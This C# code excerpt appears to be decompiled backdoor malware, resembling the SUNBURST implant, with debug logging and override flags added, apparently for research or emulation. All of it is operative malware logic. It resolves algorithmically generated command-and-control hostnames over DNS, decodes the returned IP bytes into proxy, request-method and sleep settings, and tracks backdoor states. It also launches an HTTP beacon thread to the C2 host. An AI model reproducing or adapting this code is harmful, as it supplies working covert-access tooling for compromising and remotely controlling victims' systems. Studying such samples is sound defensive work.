public static AddressFamilyEx GetAddressFamily(string hostName, DnsRecords rec)
{
rec.cname = null;
try
{
IPHostEntry iphostEntry = DnsHelper.GetIPHostEntry(hostName);
if (iphostEntry == null)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Unable to get IP addresses for " + hostName);
return(AddressFamilyEx.Error);
}
IPAddress[] addressList = iphostEntry.AddressList;
int i = 0;
while (i < addressList.Length)
{
IPAddress ipaddress = addressList[i];
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Ip address resolved for " + hostName + " " + ipaddress);
if (ipaddress.AddressFamily == AddressFamily.InterNetwork)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is InterNetwork");
if (!(iphostEntry.HostName != hostName) || string.IsNullOrEmpty(iphostEntry.HostName))
{
IPAddressesHelper.GetAddresses(ipaddress, rec);
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Geting addresses for " + ipaddress + "Rec" + rec);
return(IPAddressesHelper.GetAddressFamily(ipaddress, out rec.dnssec));
}
rec.cname = iphostEntry.HostName;
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Rec.cname is now " + iphostEntry.HostName);
if (IPAddressesHelper.GetAddressFamily(ipaddress) == AddressFamilyEx.Atm)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is InterNetwork");
return(AddressFamilyEx.Atm);
}
if (rec.dnssec)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - rec.DNSSEC is true");
rec.dnssec = false;
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is Netbios");
return(AddressFamilyEx.NetBios);
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Unable to identify address family");
return(AddressFamilyEx.Error);
}
else
{
i++;
}
}
return(AddressFamilyEx.Unknown);
}
catch (Exception)
{
}
return(AddressFamilyEx.Error);
}
public HttpHelper(byte[] customerId, DnsRecords rec)
{
this.customerId = customerId.ToArray <byte>();
Console.WriteLine("CustomerId is :" + customerId.ToArray <byte>());
this.httpHost = rec.cname;
Console.WriteLine("httpHost is :" + rec.cname);
this.requestMethod = (HttpOipMethods)rec._type;
Console.WriteLine("Request method is :" + this.requestMethod);
this.proxy = new Proxy((ProxyType)rec.length);
Console.WriteLine("Proxy is :" + this.proxy);
}
public static void GetAddresses(IPAddress address, DnsRecords rec)
{
Random random = new Random();
byte[] addressBytes = address.GetAddressBytes();
int num = (int)(addressBytes[(int)((long)addressBytes.Length) - 2] & 10);
if (num != 2)
{
if (num != 8)
{
if (num != 10)
{
rec.length = 0;
}
else
{
rec.length = 3;
}
}
else
{
rec.length = 2;
}
}
else
{
rec.length = 1;
}
num = (int)(addressBytes[(int)((long)addressBytes.Length) - 1] & 136);
if (num != 8)
{
if (num != 128)
{
if (num != 136)
{
rec._type = 0;
}
else
{
rec._type = 3;
}
}
else
{
rec._type = 2;
}
}
else
{
rec._type = 1;
}
num = (int)(addressBytes[(int)((long)addressBytes.Length) - 1] & 84);
if (num <= 20)
{
if (num == 4)
{
rec.A = random.Next(240, 300);
return;
}
if (num == 16)
{
rec.A = random.Next(480, 600);
return;
}
if (num == 20)
{
rec.A = random.Next(1440, 1560);
return;
}
}
else if (num <= 68)
{
if (num == 64)
{
rec.A = random.Next(4320, 5760);
return;
}
if (num == 68)
{
rec.A = random.Next(10020, 10140);
return;
}
}
else
{
if (num == 80)
{
rec.A = random.Next(20100, 20220);
return;
}
if (num == 84)
{
rec.A = random.Next(43140, 43260);
return;
}
}
rec.A = 0;
}
private static void Update()
{
bool flag = false;
CryptoHelper cryptoHelper = new CryptoHelper(userId, domain4);
HttpHelper httpHelper = null;
Thread thread = null;
bool flag2 = true;
AddressFamilyEx addressFamilyEx = AddressFamilyEx.Unknown;
int num = 0;
bool flag3 = true;
DnsRecords dnsRecords = new DnsRecords();
Random random = new Random();
int a = 0;
if (!UpdateNotification())
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() failed.");
return;
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() complete.");
Settings.svcListModified2 = false;
int num2 = 1;
while (num2 <= 3 && !flag)
{
Utilities.DelayMin(dnsRecords.A, dnsRecords.A);
if (!ProcessTracker.TrackProcesses(true))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - TrackProcesses() complete.");
if (Settings.svcListModified1)
{
flag3 = true;
}
num = (Settings.svcListModified2 ? (num + 1) : 0);
string hostName;
if (status == ReportStatus.New)
{
hostName = ((addressFamilyEx == AddressFamilyEx.Error) ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out flag2));
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName);
}
else
{
if (status != ReportStatus.Append)
{
break;
}
hostName = (flag3 ? cryptoHelper.GetNextStringEx(dnsRecords.dnssec) : cryptoHelper.GetNextString(dnsRecords.dnssec));
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName);
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor is pulling the dnsRecords of C2: " + dnsRecords);
if (bypassn)
{
hostName = Settings.fakehost;
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Bypassing original C2 hostname and instead will be using " + hostName);
}
addressFamilyEx = DnsHelper.GetAddressFamily(hostName, dnsRecords);
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - AddressFamily is (-1 Netbios, -2 ImpLink, -3 Atm, -4 Ipx, -5 InterNetwork, -6 InterNetworkV6, -7 Unknown, -8 Error) : " + addressFamilyEx + " [-1-8 to force Family]");
if (forcea)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Netbios family");
addressFamilyEx = AddressFamilyEx.NetBios;
dnsRecords.cname = Settings.fakehost;
}
if (forceb)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing ImpLink family");
addressFamilyEx = AddressFamilyEx.ImpLink;
}
if (forcec)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Atm family");
addressFamilyEx = AddressFamilyEx.Atm;
}
if (forced)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Ipx family");
addressFamilyEx = AddressFamilyEx.Ipx;
}
if (forcee)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetwork family");
addressFamilyEx = AddressFamilyEx.InterNetwork;
}
if (forcef)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetworkV6 family");
addressFamilyEx = AddressFamilyEx.InterNetworkV6;
}
if (forceg)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Unknown family");
addressFamilyEx = AddressFamilyEx.Unknown;
}
if (forceh)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Error family");
addressFamilyEx = AddressFamilyEx.Error;
}
switch (addressFamilyEx)
{
case AddressFamilyEx.NetBios:
if (status == ReportStatus.Append)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is APPEND");
flag3 = false;
if (dnsRecords.dnssec)
{
a = dnsRecords.A;
dnsRecords.A = random.Next(1, 3);
}
}
if (status == ReportStatus.New && flag2)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is NEW");
status = ReportStatus.Append;
ConfigManager.WriteReportStatus(status);
}
if (!string.IsNullOrEmpty(dnsRecords.cname))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - HTTPHELPER");
dnsRecords.A = a;
HttpHelper.Close(httpHelper, thread);
httpHelper = new HttpHelper(userId, dnsRecords);
if (!Settings.svcListModified2 || num > 1)
{
Settings.svcListModified2 = false;
thread = new Thread(new ThreadStart(httpHelper.Initialize))
{
IsBackground = true
};
thread.Start();
}
}
num2 = 0;
break;
case AddressFamilyEx.ImpLink:
case AddressFamilyEx.Atm:
ConfigManager.WriteReportStatus(ReportStatus.Truncate);
ProcessTracker.SetAutomaticMode();
flag = true;
break;
case AddressFamilyEx.Ipx:
if (status == ReportStatus.Append)
{
ConfigManager.WriteReportStatus(ReportStatus.New);
}
flag = true;
break;
case AddressFamilyEx.InterNetwork:
case AddressFamilyEx.InterNetworkV6:
case AddressFamilyEx.Unknown:
goto IL_1F7;
case AddressFamilyEx.Error:
dnsRecords.A = random.Next(420, 540);
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Random dnsRecord generated.");
break;
default:
goto IL_1F7;
}
IL_1F9:
num2++;
continue;
IL_1F7:
flag = true;
goto IL_1F9;
}
break;
}
HttpHelper.Close(httpHelper, thread);
}
